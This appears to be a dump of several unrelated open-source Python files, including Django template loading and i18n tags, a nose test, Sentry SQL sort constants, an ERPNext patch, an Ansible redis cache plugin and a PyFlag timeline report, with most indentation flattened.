raise TypeError, 'Validation Error, expecting %s, got %s' % (self.data_type, type(value))
def get_value_for_datastore(self, model_instance):
if self.auto_now:
setattr(model_instance, self.name, self.now())
return Property.get_value_for_datastore(self, model_instance)
def now(self):
return datetime.datetime.utcnow()
class DateProperty(Property):
data_type = datetime.date
type_name = 'Date'
def __init__(self, verbose_name=None, auto_now=False, auto_now_add=False, name=None,
default=None, required=False, validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
def default_value(self):
if self.auto_now or self.auto_now_add:
return self.now()
return Property.default_value(self)
def validate(self, value):
if value == None:
return
if not isinstance(value, self.data_type):
raise TypeError, 'Validation Error, expecting %s, got %s' % (self.data_type, type(value))
def get_value_for_datastore(self, model_instance):
if self.auto_now:
setattr(model_instance, self.name, self.now())
return Property.get_value_for_datastore(self, model_instance)
def now(self):
return datetime.date.today()
class ReferenceProperty(Property):
data_type = Key
type_name = 'Reference'
def __init__(self, reference_class=None, collection_name=None,
verbose_name=None, name=None, default=None, required=False, validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.reference_class = reference_class
self.collection_name = collection_name
def __get__(self, obj, objtype):
if obj:
value = getattr(obj, self.slot_name)
if value == self.default_value():
return value
            # If the value is still the UUID for the referenced object, we
            # need to create the object now that the attribute has actually
            # been accessed. This lazy instantiation saves unnecessary
            # roundtrips to SimpleDB.
if isinstance(value, str) or isinstance(value, unicode):
value = self.reference_class(value)
setattr(obj, self.name, value)
return value
def __property_config__(self, model_class, property_name):
Property.__property_config__(self, model_class, property_name)
if self.collection_name is None:
self.collection_name = '%s_%s_set' % (model_class.__name__.lower(), self.name)
if hasattr(self.reference_class, self.collection_name):
raise ValueError, 'duplicate property: %s' % self.collection_name
setattr(self.reference_class, self.collection_name,
_ReverseReferenceProperty(model_class, property_name, self.collection_name))
def check_uuid(self, value):
# This does a bit of hand waving to "type check" the string
t = value.split('-')
if len(t) != 5:
raise ValueError
def check_instance(self, value):
try:
obj_lineage = value.get_lineage()
cls_lineage = self.reference_class.get_lineage()
if obj_lineage.startswith(cls_lineage):
return
raise TypeError, '%s not instance of %s' % (obj_lineage, cls_lineage)
except:
raise ValueError, '%s is not a Model' % value
def validate(self, value):
if self.required and value==None:
raise ValueError, '%s is a required property' % self.name
if value == self.default_value():
return
if not isinstance(value, str) and not isinstance(value, unicode):
self.check_instance(value)
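# Relationship sketch (hypothetical models): given
#   class Book(Model):
#       author = ReferenceProperty(Author, collection_name='books')
# reading book.author lazily instantiates the Author from its stored id (see
# __get__ above), while author.books resolves through the
# _ReverseReferenceProperty defined below to a Query over matching Books.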
class _ReverseReferenceProperty(Property):
data_type = Query
type_name = 'query'
def __init__(self, model, prop, name):
self.__model = model
self.__property = prop
self.collection_name = prop
self.name = name
self.item_type = model
def __get__(self, model_instance, model_class):
"""Fetches collection of model instances of this collection property."""
if model_instance is not None:
query = Query(self.__model)
if type(self.__property) == list:
props = []
for prop in self.__property:
props.append("%s =" % prop)
return query.filter(props, model_instance)
else:
return query.filter(self.__property + ' =', model_instance)
else:
return self
def __set__(self, model_instance, value):
"""Not possible to set a new collection."""
raise ValueError, 'Virtual property is read-only'
class CalculatedProperty(Property):
def __init__(self, verbose_name=None, name=None, default=None,
required=False, validator=None, choices=None,
calculated_type=int, unique=False, use_method=False):
Property.__init__(self, verbose_name, name, default, required,
validator, choices, unique)
self.calculated_type = calculated_type
self.use_method = use_method
def __get__(self, obj, objtype):
value = self.default_value()
if obj:
try:
value = getattr(obj, self.slot_name)
if self.use_method:
value = value()
except AttributeError:
pass
return value
def __set__(self, obj, value):
"""Not possible to set a new AutoID."""
pass
def _set_direct(self, obj, value):
if not self.use_method:
setattr(obj, self.slot_name, value)
def get_value_for_datastore(self, model_instance):
if self.calculated_type in [str, int, bool]:
value = self.__get__(model_instance, model_instance.__class__)
return value
else:
return None
class ListProperty(Property):
data_type = list
type_name = 'List'
def __init__(self, item_type, verbose_name=None, name=None, default=None, **kwds):
if default is None:
default = []
self.item_type = item_type
Property.__init__(self, verbose_name, name, default=default, required=True, **kwds)
def validate(self, value):
if value is not None:
if not isinstance(value, list):
value = [value]
if self.item_type in (int, long):
item_type = (int, long)
elif self.item_type in (str, unicode):
item_type = (str, unicode)
else:
item_type = self.item_type
for item in value:
if not isinstance(item, item_type):
if item_type == (int, long):
raise ValueError, 'Items in the %s list must all be integers.' % self.name
else:
raise ValueError('Items in the %s list must all be %s instances' %
(self.name, self.item_type.__name__))
return value
def empty(self, value):
return value is None
def default_value(self):
return list(super(ListProperty, self).default_value())
    def __set__(self, obj, value):
        """
        Override the set method to allow setting the property to a single
        instance of item_type instead of requiring a list to be passed in.
        """
if self.item_type in (int, long):
item_type = (int, long)
elif self.item_type in (str, unicode):
item_type = (str, unicode)
else:
item_type = self.item_type
if isinstance(value, item_type):
value = [value]
elif value == None: # Override to allow them to set this to "None" to remove everything
value = []
return super(ListProperty, self).__set__(obj,value)
class MapProperty(Property):
data_type = dict
type_name = 'Map'
def __init__(self, item_type=str, verbose_name=None, name=None, default=None, **kwds):
if default is None:
default = {}
self.item_type = item_type
Property.__init__(self, verbose_name, name, default=default, required=True, **kwds)
def validate(self, value):
if value is not None:
if not isinstance(value, dict):
                raise ValueError, 'Value must be of type dict'
if self.item_type in (int, long):
item_type = (int, long)
elif self.item_type in (str, unicode):
item_type = (str, unicode)
else:
item_type = self.item_type
for key in value:
if not isinstance(value[key], item_type):
if item_type == (int, long):
raise ValueError, 'Values in the %s Map must all be integers.' % self.name
else:
raise ValueError('Values in the %s Map must all be %s instances' %
(self.name, self.item_type.__name__))
return value
def empty(self, value):
return value is None
def default_value(self):
return {}
|
andymckay/django
|
refs/heads/master
|
django/template/loader.py
|
83
|
# Wrapper for loading templates from storage of some sort (e.g. filesystem, database).
#
# This uses the TEMPLATE_LOADERS setting, which is a list of loaders to use.
# Each loader is expected to have this interface:
#
# callable(name, dirs=[])
#
# name is the template name.
# dirs is an optional list of directories to search instead of TEMPLATE_DIRS.
#
# The loader should return a tuple of (template_source, path). The path returned
# might be shown to the user for debugging purposes, so it should identify where
# the template was loaded from.
#
# A loader may return an already-compiled template instead of the actual
# template source. In that case the path returned should be None, since the
# path information is associated with the template during the compilation,
# which has already been done.
#
# Each loader should have an "is_usable" attribute set. This is a boolean that
# specifies whether the loader can be used in this Python installation. Each
# loader is responsible for setting this when it's initialized.
#
# For example, the eggs loader (which is capable of loading templates from
# Python eggs) sets is_usable to False if the "pkg_resources" module isn't
# installed, because pkg_resources is necessary to read eggs.
from django.core.exceptions import ImproperlyConfigured
from django.template.base import Origin, Template, Context, TemplateDoesNotExist, add_to_builtins
from django.utils.importlib import import_module
from django.conf import settings
template_source_loaders = None
class BaseLoader(object):
is_usable = False
def __init__(self, *args, **kwargs):
pass
def __call__(self, template_name, template_dirs=None):
return self.load_template(template_name, template_dirs)
def load_template(self, template_name, template_dirs=None):
source, display_name = self.load_template_source(template_name, template_dirs)
origin = make_origin(display_name, self.load_template_source, template_name, template_dirs)
try:
template = get_template_from_string(source, origin, template_name)
return template, None
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist, back off to
# returning the source and display name for the template we were asked to load.
# This allows for correct identification (later) of the actual template that does
# not exist.
return source, display_name
def load_template_source(self, template_name, template_dirs=None):
"""
Returns a tuple containing the source and origin for the given template
name.
"""
raise NotImplementedError
def reset(self):
"""
Resets any state maintained by the loader instance (e.g., cached
templates or cached loader modules).
"""
pass
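# Illustrative sketch (not part of Django): a minimal function-based loader
# matching the interface documented at the top of this module. The template
# store and its contents are hypothetical.
_EXAMPLE_TEMPLATES = {'hello.html': 'Hello, {{ name }}!'}

def example_dict_loader(template_name, template_dirs=None):
    """Serve template source from an in-memory dict."""
    try:
        # Return (source, display_name); the display name identifies where
        # the template was loaded from, for debugging.
        return _EXAMPLE_TEMPLATES[template_name], 'dict:%s' % template_name
    except KeyError:
        raise TemplateDoesNotExist(template_name)
example_dict_loader.is_usable = True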
class LoaderOrigin(Origin):
def __init__(self, display_name, loader, name, dirs):
super(LoaderOrigin, self).__init__(display_name)
self.loader, self.loadname, self.dirs = loader, name, dirs
def reload(self):
return self.loader(self.loadname, self.dirs)[0]
def make_origin(display_name, loader, name, dirs):
if settings.TEMPLATE_DEBUG and display_name:
return LoaderOrigin(display_name, loader, name, dirs)
else:
return None
def find_template_loader(loader):
if isinstance(loader, (tuple, list)):
loader, args = loader[0], loader[1:]
else:
args = []
if isinstance(loader, basestring):
module, attr = loader.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError, e:
raise ImproperlyConfigured('Error importing template source loader %s: "%s"' % (loader, e))
try:
TemplateLoader = getattr(mod, attr)
except AttributeError, e:
raise ImproperlyConfigured('Error importing template source loader %s: "%s"' % (loader, e))
if hasattr(TemplateLoader, 'load_template_source'):
func = TemplateLoader(*args)
else:
# Try loading module the old way - string is full path to callable
if args:
raise ImproperlyConfigured("Error importing template source loader %s - can't pass arguments to function-based loader." % loader)
func = TemplateLoader
if not func.is_usable:
import warnings
warnings.warn("Your TEMPLATE_LOADERS setting includes %r, but your Python installation doesn't support that type of template loading. Consider removing that line from TEMPLATE_LOADERS." % loader)
return None
else:
return func
else:
raise ImproperlyConfigured('Loader does not define a "load_template" callable template source loader')
def find_template(name, dirs=None):
# Calculate template_source_loaders the first time the function is executed
# because putting this logic in the module-level namespace may cause
# circular import errors. See Django ticket #1292.
global template_source_loaders
if template_source_loaders is None:
loaders = []
for loader_name in settings.TEMPLATE_LOADERS:
loader = find_template_loader(loader_name)
if loader is not None:
loaders.append(loader)
template_source_loaders = tuple(loaders)
for loader in template_source_loaders:
try:
source, display_name = loader(name, dirs)
return (source, make_origin(display_name, loader, name, dirs))
except TemplateDoesNotExist:
pass
raise TemplateDoesNotExist(name)
def get_template(template_name):
"""
Returns a compiled Template object for the given template name,
handling template inheritance recursively.
"""
template, origin = find_template(template_name)
if not hasattr(template, 'render'):
# template needs to be compiled
template = get_template_from_string(template, origin, template_name)
return template
def get_template_from_string(source, origin=None, name=None):
"""
Returns a compiled Template object for the given template code,
handling template inheritance recursively.
"""
return Template(source, origin, name)
def render_to_string(template_name, dictionary=None, context_instance=None):
"""
Loads the given template_name and renders it with the given dictionary as
context. The template_name may be a string to load a single template using
get_template, or it may be a tuple to use select_template to find one of
the templates in the list. Returns a string.
"""
dictionary = dictionary or {}
if isinstance(template_name, (list, tuple)):
t = select_template(template_name)
else:
t = get_template(template_name)
if not context_instance:
return t.render(Context(dictionary))
# Add the dictionary to the context stack, ensuring it gets removed again
# to keep the context_instance in the same state it started in.
context_instance.update(dictionary)
try:
return t.render(context_instance)
finally:
context_instance.pop()
def select_template(template_name_list):
"Given a list of template names, returns the first that can be loaded."
if not template_name_list:
raise TemplateDoesNotExist("No template names provided")
not_found = []
for template_name in template_name_list:
try:
return get_template(template_name)
except TemplateDoesNotExist, e:
if e.args[0] not in not_found:
not_found.append(e.args[0])
continue
# If we get here, none of the templates could be loaded
raise TemplateDoesNotExist(', '.join(not_found))
add_to_builtins('django.template.loader_tags')
|
cloudera/hue
|
refs/heads/master
|
desktop/core/ext-py/nose-1.3.7/unit_tests/test_result_proxy.py
|
10
|
import sys
import unittest
from inspect import ismethod
from nose.config import Config
from nose.proxy import ResultProxyFactory, ResultProxy
from mock import RecordingPluginManager
class TestResultProxy(unittest.TestCase):
def test_proxy_has_basic_methods(self):
res = unittest.TestResult()
proxy = ResultProxy(res, test=None)
methods = [ 'addError', 'addFailure', 'addSuccess',
'startTest', 'stopTest', 'stop' ]
for method in methods:
m = getattr(proxy, method)
assert ismethod(m), "%s is not a method" % method
def test_proxy_has_nose_methods(self):
res = unittest.TestResult()
proxy = ResultProxy(res, test=None)
methods = [ 'beforeTest', 'afterTest' ]
for method in methods:
m = getattr(proxy, method)
assert ismethod(m), "%s is not a method" % method
def test_proxy_proxies(self):
from nose.case import Test
class Dummy:
def __init__(self):
self.__dict__['called'] = []
def __getattr__(self, attr):
c = self.__dict__['called']
c.append(attr)
def dummy(*arg, **kw):
pass
return dummy
class TC(unittest.TestCase):
def runTest(self):
pass
try:
raise Exception("exception")
except:
err = sys.exc_info()
test = TC()
case = Test(test)
res = Dummy()
proxy = ResultProxy(res, test=case)
proxy.addError(test, err)
proxy.addFailure(test, err)
proxy.addSuccess(test)
proxy.startTest(test)
proxy.stopTest(test)
proxy.beforeTest(test)
proxy.afterTest(test)
proxy.stop()
proxy.shouldStop = 'yes please'
for method in ['addError', 'addFailure', 'addSuccess',
'startTest', 'stopTest', 'beforeTest', 'afterTest',
'stop']:
            assert method in res.called, "%s was not proxied" % method
self.assertEqual(res.shouldStop, 'yes please')
def test_attributes_are_proxied(self):
res = unittest.TestResult()
proxy = ResultProxy(res, test=None)
proxy.errors
proxy.failures
proxy.shouldStop
proxy.testsRun
def test_test_cases_can_access_result_attributes(self):
from nose.case import Test
class TC(unittest.TestCase):
def run(self, result):
unittest.TestCase.run(self, result)
print "errors", result.errors
print "failures", result.failures
def runTest(self):
pass
test = TC()
case = Test(test)
res = unittest.TestResult()
proxy = ResultProxy(res, test=case)
case(proxy)
def test_proxy_handles_missing_methods(self):
from nose.case import Test
class TC(unittest.TestCase):
def runTest(self):
pass
test = TC()
case = Test(test)
res = unittest.TestResult()
proxy = ResultProxy(res, case)
proxy.beforeTest(test)
proxy.afterTest(test)
def test_proxy_calls_plugins(self):
from nose.case import Test
res = unittest.TestResult()
class TC(unittest.TestCase):
def test_error(self):
print "So long"
raise TypeError("oops")
def test_fail(self):
print "Hello"
self.fail()
def test(self):
pass
plugs = RecordingPluginManager()
config = Config(plugins=plugs)
factory = ResultProxyFactory(config=config)
case_e = Test(TC('test_error'))
case_f = Test(TC('test_fail'))
case_t = Test(TC('test'))
pres_e = factory(res, case_e)
case_e(pres_e)
assert 'beforeTest' in plugs.called
assert 'startTest' in plugs.called
assert 'addError' in plugs.called
assert 'stopTest' in plugs.called
assert 'afterTest' in plugs.called
plugs.reset()
pres_f = factory(res, case_f)
case_f(pres_f)
assert 'beforeTest' in plugs.called
assert 'startTest' in plugs.called
assert 'addFailure' in plugs.called
assert 'stopTest' in plugs.called
assert 'afterTest' in plugs.called
plugs.reset()
pres_t = factory(res, case_t)
case_t(pres_t)
assert 'beforeTest' in plugs.called
assert 'startTest' in plugs.called
assert 'addSuccess' in plugs.called
assert 'stopTest' in plugs.called
assert 'afterTest' in plugs.called
plugs.reset()
def test_stop_on_error(self):
from nose.case import Test
class TC(unittest.TestCase):
def runTest(self):
raise Exception("Enough!")
conf = Config(stopOnError=True)
test = TC()
case = Test(test)
res = unittest.TestResult()
proxy = ResultProxy(res, case, config=conf)
case(proxy)
assert proxy.shouldStop
assert res.shouldStop
def test_coercion_of_custom_exception(self):
from nose.case import Test
class CustomException(Exception):
def __init__(self, message, two, three):
Exception.__init__(self, message)
class TC(unittest.TestCase):
def runTest(self):
pass
test = TC()
case = Test(test)
res = unittest.TestResult()
try:
raise CustomException("the error", 2, 3)
except:
etype, val, tb = sys.exc_info()
val = str(val) # simulate plugin shenanigans
proxy = ResultProxy(res, test=case)
# Python 3 coercion should happen here without error
proxy.addError(test, (etype, val, tb))
proxy.addFailure(test, (etype, val, tb))
if __name__ == '__main__':
unittest.main()
|
octavioturra/aritial
|
refs/heads/master
|
google_appengine/lib/django/django/templatetags/i18n.py
|
33
|
from django.template import Node, resolve_variable
from django.template import TemplateSyntaxError, TokenParser, Library
from django.template import TOKEN_TEXT, TOKEN_VAR
from django.utils import translation
register = Library()
class GetAvailableLanguagesNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
from django.conf import settings
context[self.variable] = [(k, translation.gettext(v)) for k, v in settings.LANGUAGES]
return ''
class GetCurrentLanguageNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
context[self.variable] = translation.get_language()
return ''
class GetCurrentLanguageBidiNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
context[self.variable] = translation.get_language_bidi()
return ''
class TranslateNode(Node):
def __init__(self, value, noop):
self.value = value
self.noop = noop
def render(self, context):
value = resolve_variable(self.value, context)
if self.noop:
return value
else:
return translation.gettext(value)
class BlockTranslateNode(Node):
def __init__(self, extra_context, singular, plural=None, countervar=None, counter=None):
self.extra_context = extra_context
self.singular = singular
self.plural = plural
self.countervar = countervar
self.counter = counter
def render_token_list(self, tokens):
result = []
for token in tokens:
if token.token_type == TOKEN_TEXT:
result.append(token.contents)
elif token.token_type == TOKEN_VAR:
result.append('%%(%s)s' % token.contents)
return ''.join(result)
def render(self, context):
context.push()
for var,val in self.extra_context.items():
context[var] = val.resolve(context)
singular = self.render_token_list(self.singular)
if self.plural and self.countervar and self.counter:
count = self.counter.resolve(context)
context[self.countervar] = count
plural = self.render_token_list(self.plural)
result = translation.ngettext(singular, plural, count) % context
else:
result = translation.gettext(singular) % context
context.pop()
return result
def do_get_available_languages(parser, token):
"""
This will store a list of available languages
in the context.
Usage::
{% get_available_languages as languages %}
{% for language in languages %}
...
{% endfor %}
This will just pull the LANGUAGES setting from
your setting file (or the default settings) and
put it into the named variable.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError, "'get_available_languages' requires 'as variable' (got %r)" % args
return GetAvailableLanguagesNode(args[2])
def do_get_current_language(parser, token):
"""
This will store the current language in the context.
Usage::
{% get_current_language as language %}
This will fetch the currently active language and
    put its value into the ``language`` context
variable.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError, "'get_current_language' requires 'as variable' (got %r)" % args
return GetCurrentLanguageNode(args[2])
def do_get_current_language_bidi(parser, token):
"""
This will store the current language layout in the context.
Usage::
{% get_current_language_bidi as bidi %}
This will fetch the currently active language's layout and
    put its value into the ``bidi`` context variable.
    True indicates right-to-left layout; otherwise, left-to-right.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError, "'get_current_language_bidi' requires 'as variable' (got %r)" % args
return GetCurrentLanguageBidiNode(args[2])
def do_translate(parser, token):
"""
This will mark a string for translation and will
translate the string for the current language.
Usage::
{% trans "this is a test" %}
This will mark the string for translation so it will
    be pulled out by make-messages.py into the .po files
and will run the string through the translation engine.
There is a second form::
{% trans "this is a test" noop %}
This will only mark for translation, but will return
the string unchanged. Use it when you need to store
values into forms that should be translated later on.
You can use variables instead of constant strings
to translate stuff you marked somewhere else::
{% trans variable %}
This will just try to translate the contents of
the variable ``variable``. Make sure that the string
in there is something that is in the .po file.
"""
class TranslateParser(TokenParser):
def top(self):
value = self.value()
if self.more():
if self.tag() == 'noop':
noop = True
else:
raise TemplateSyntaxError, "only option for 'trans' is 'noop'"
else:
noop = False
return (value, noop)
value, noop = TranslateParser(token.contents).top()
return TranslateNode(value, noop)
def do_block_translate(parser, token):
"""
This will translate a block of text with parameters.
Usage::
{% blocktrans with foo|filter as bar and baz|filter as boo %}
This is {{ bar }} and {{ boo }}.
{% endblocktrans %}
Additionally, this supports pluralization::
{% blocktrans count var|length as count %}
There is {{ count }} object.
{% plural %}
There are {{ count }} objects.
{% endblocktrans %}
This is much like ngettext, only in template syntax.
"""
class BlockTranslateParser(TokenParser):
def top(self):
countervar = None
counter = None
extra_context = {}
while self.more():
tag = self.tag()
if tag == 'with' or tag == 'and':
value = self.value()
if self.tag() != 'as':
raise TemplateSyntaxError, "variable bindings in 'blocktrans' must be 'with value as variable'"
extra_context[self.tag()] = parser.compile_filter(value)
elif tag == 'count':
counter = parser.compile_filter(self.value())
if self.tag() != 'as':
raise TemplateSyntaxError, "counter specification in 'blocktrans' must be 'count value as variable'"
countervar = self.tag()
else:
raise TemplateSyntaxError, "unknown subtag %s for 'blocktrans' found" % tag
return (countervar, counter, extra_context)
countervar, counter, extra_context = BlockTranslateParser(token.contents).top()
singular = []
plural = []
while parser.tokens:
token = parser.next_token()
if token.token_type in (TOKEN_VAR, TOKEN_TEXT):
singular.append(token)
else:
break
if countervar and counter:
if token.contents.strip() != 'plural':
raise TemplateSyntaxError, "'blocktrans' doesn't allow other block tags inside it"
while parser.tokens:
token = parser.next_token()
if token.token_type in (TOKEN_VAR, TOKEN_TEXT):
plural.append(token)
else:
break
if token.contents.strip() != 'endblocktrans':
raise TemplateSyntaxError, "'blocktrans' doesn't allow other block tags (seen %r) inside it" % token.contents
return BlockTranslateNode(extra_context, singular, plural, countervar, counter)
register.tag('get_available_languages', do_get_available_languages)
register.tag('get_current_language', do_get_current_language)
register.tag('get_current_language_bidi', do_get_current_language_bidi)
register.tag('trans', do_translate)
register.tag('blocktrans', do_block_translate)
|
JackDanger/sentry
|
refs/heads/master
|
src/sentry/search/django/constants.py
|
7
|
"""
sentry.search.django.constants
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
SORT_CLAUSES = {
'priority': 'sentry_groupedmessage.score',
'date': 'EXTRACT(EPOCH FROM sentry_groupedmessage.last_seen)::int',
'new': 'EXTRACT(EPOCH FROM sentry_groupedmessage.first_seen)::int',
'freq': 'sentry_groupedmessage.times_seen',
}
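# Each mapping resolves a user-facing sort key to a raw SQL ORDER BY
# expression; the base dict is Postgres-flavored (EXTRACT(EPOCH ...)), and the
# engine-specific copies below override only the clauses whose date/epoch
# functions differ.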
SQLITE_SORT_CLAUSES = SORT_CLAUSES.copy()
SQLITE_SORT_CLAUSES.update({
'date': "cast((julianday(sentry_groupedmessage.last_seen) - 2440587.5) * 86400.0 as INTEGER)",
'new': "cast((julianday(sentry_groupedmessage.first_seen) - 2440587.5) * 86400.0 as INTEGER)",
})
MYSQL_SORT_CLAUSES = SORT_CLAUSES.copy()
MYSQL_SORT_CLAUSES.update({
'date': 'UNIX_TIMESTAMP(sentry_groupedmessage.last_seen)',
'new': 'UNIX_TIMESTAMP(sentry_groupedmessage.first_seen)',
})
ORACLE_SORT_CLAUSES = SORT_CLAUSES.copy()
ORACLE_SORT_CLAUSES.update({
'date': "(cast(sentry_groupedmessage.last_seen as date)-TO_DATE('01/01/1970 00:00:00', 'MM-DD-YYYY HH24:MI:SS')) * 24 * 60 * 60",
'new': "(cast(sentry_groupedmessage.first_seen as date)-TO_DATE('01/01/1970 00:00:00', 'MM-DD-YYYY HH24:MI:SS')) * 24 * 60 * 60",
})
MSSQL_SORT_CLAUSES = SORT_CLAUSES.copy()
MSSQL_SORT_CLAUSES.update({
'date': "DATEDIFF(s, '1970-01-01T00:00:00', sentry_groupedmessage.last_seen)",
'new': "DATEDIFF(s, '1970-01-01T00:00:00', sentry_groupedmessage.first_seen)",
})
MSSQL_ENGINES = set(['django_pytds', 'sqlserver_ado', 'sql_server.pyodbc'])
|
arru/pypegs
|
refs/heads/master
|
pypegs/__init__.py
|
1
|
# pyPEGS
#
# Copyright (c) 2015, Arvid Rudling
# All rights reserved.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
|
brownharryb/erpnext
|
refs/heads/develop
|
erpnext/patches/v4_2/delete_old_print_formats.py
|
120
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
old_formats = ("Sales Invoice", "Sales Invoice Spartan", "Sales Invoice Modern",
"Sales Invoice Classic",
"Sales Order Spartan", "Sales Order Modern", "Sales Order Classic",
"Purchase Order Spartan", "Purchase Order Modern", "Purchase Order Classic",
"Quotation Spartan", "Quotation Modern", "Quotation Classic",
"Delivery Note Spartan", "Delivery Note Modern", "Delivery Note Classic")
for fmt in old_formats:
# update property setter
for ps in frappe.db.sql_list("""select name from `tabProperty Setter`
where property='default_print_format' and value=%s""", fmt):
ps = frappe.get_doc("Property Setter", ps)
ps.value = "Standard"
ps.save(ignore_permissions = True)
frappe.delete_doc_if_exists("Print Format", fmt)
|
mudbungie/carrieocoyle
|
refs/heads/master
|
gallery/migrations/0008_remove_piece_medium.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0007_auto_20151027_1103'),
]
operations = [
migrations.RemoveField(
model_name='piece',
name='medium',
),
]
|
blakfeld/ansible
|
refs/heads/devel
|
lib/ansible/plugins/cache/redis.py
|
34
|
# (c) 2014, Brian Coca, Josh Drake, et al
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
# FIXME: can we store these as something else before we ship it?
import sys
import time
import json
from ansible import constants as C
from ansible.plugins.cache.base import BaseCacheModule
try:
from redis import StrictRedis
except ImportError:
print("The 'redis' python module is required, 'pip install redis'")
sys.exit(1)
class CacheModule(BaseCacheModule):
"""
A caching module backed by redis.
    Keys are maintained in a zset with their score being the timestamp
    when they are inserted. This allows 'zremrangebyscore' to be used to
    expire keys; this mechanism is used instead of a pattern-matched
    'scan', for performance.
"""
def __init__(self, *args, **kwargs):
if C.CACHE_PLUGIN_CONNECTION:
connection = C.CACHE_PLUGIN_CONNECTION.split(':')
else:
connection = []
self._timeout = float(C.CACHE_PLUGIN_TIMEOUT)
self._prefix = C.CACHE_PLUGIN_PREFIX
self._cache = StrictRedis(*connection)
self._keys_set = 'ansible_cache_keys'
def _make_key(self, key):
return self._prefix + key
def get(self, key):
value = self._cache.get(self._make_key(key))
# guard against the key not being removed from the zset;
# this could happen in cases where the timeout value is changed
# between invocations
if value is None:
self.delete(key)
raise KeyError
return json.loads(value)
def set(self, key, value):
value2 = json.dumps(value)
if self._timeout > 0: # a timeout of 0 is handled as meaning 'never expire'
self._cache.setex(self._make_key(key), int(self._timeout), value2)
else:
self._cache.set(self._make_key(key), value2)
self._cache.zadd(self._keys_set, time.time(), key)
def _expire_keys(self):
if self._timeout > 0:
expiry_age = time.time() - self._timeout
self._cache.zremrangebyscore(self._keys_set, 0, expiry_age)
def keys(self):
self._expire_keys()
return self._cache.zrange(self._keys_set, 0, -1)
def contains(self, key):
self._expire_keys()
return (self._cache.zrank(self._keys_set, key) >= 0)
def delete(self, key):
self._cache.delete(self._make_key(key))
self._cache.zrem(self._keys_set, key)
def flush(self):
for key in self.keys():
self.delete(key)
def copy(self):
# FIXME: there is probably a better way to do this in redis
ret = dict()
for key in self.keys():
ret[key] = self.get(key)
return ret
def __getstate__(self):
return dict()
def __setstate__(self, data):
self.__init__()
|
naototty/pyflag
|
refs/heads/master
|
src/plugins_old/DiskForensics/TimeLine.py
|
5
|
# ******************************************************
# Copyright 2004: Commonwealth of Australia.
#
# Developed by the Computer Network Vulnerability Team,
# Information Security Group.
# Department of Defence.
#
# Michael Cohen <scudette@users.sourceforge.net>
# David Collett <daveco@users.sourceforge.net>
#
# ******************************************************
# Version: FLAG $Version: 0.87-pre1 Date: Thu Jun 12 00:48:38 EST 2008$
# ******************************************************
#
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# ******************************************************
""" PyFlag module for Timeline analysis.
"""
from pyflag.ColumnTypes import IntegerType, TimestampType, FilenameType, StringType, StateType, AFF4URN, DeletedType, BinaryType
### FIXME - this module needs updating!!!!
import pyflag.Reports as Reports
from pyflag.FlagFramework import Curry,query_type
import pyflag.FlagFramework as FlagFramework
import pyflag.conf
config=pyflag.conf.ConfObject()
class MACTimes(FlagFramework.EventHandler):
def create(self, dbh, case):
dbh.execute("""create table if not exists mac(
`inode_id` INT NOT NULL default 0,
`status` varchar(8) default '',
`time` timestamp NOT NULL default '0000-00-00 00:00:00',
`m` int default NULL,
`a` tinyint default NULL,
`c` tinyint default NULL,
`d` tinyint default NULL,
`name` text
) """)
class Timeline(Reports.report):
""" View file MAC times in a searchable table """
name = "View File Timeline"
family = "Disk Forensics"
description = "Browse file creation, modification, and access times"
def form(self, query, result):
result.case_selector()
def analyse(self, query):
dbh = self.DBO(query['case'])
temp_table = dbh.get_temp()
dbh.check_index("inode","inode")
dbh.execute("create temporary table %s select i.inode_id,f.status,mtime as `time`,1 as `m`,0 as `a`,0 as `c`,0 as `d`,concat(path,name) as `name` from inode as i left join file as f on i.inode=f.inode" %
(temp_table, ));
dbh.execute("insert into %s select i.inode_id,f.status,atime,0,1,0,0,concat(path,name) from inode as i left join file as f on i.inode_id=f.inode_id" % (temp_table,))
dbh.execute("insert into %s select i.inode_id,f.status,ctime,0,0,1,0,concat(path,name) from inode as i left join file as f on i.inode_id=f.inode_id" % (temp_table, ))
dbh.execute("insert into %s select i.inode_id,f.status,dtime,0,0,0,1,concat(path,name) from inode as i left join file as f on i.inode_id=f.inode_id" % (temp_table, ))
